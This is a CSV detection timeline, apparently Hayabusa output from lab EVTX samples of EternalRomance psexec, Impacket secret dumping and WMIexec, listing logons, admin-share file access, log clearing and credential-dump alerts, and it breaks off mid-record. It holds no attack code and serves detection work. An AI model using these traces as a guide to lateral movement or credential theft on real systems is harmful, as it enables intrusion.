10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60285 : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60232 : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50078 : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63558 : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63534 : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50896 : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 56740 : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 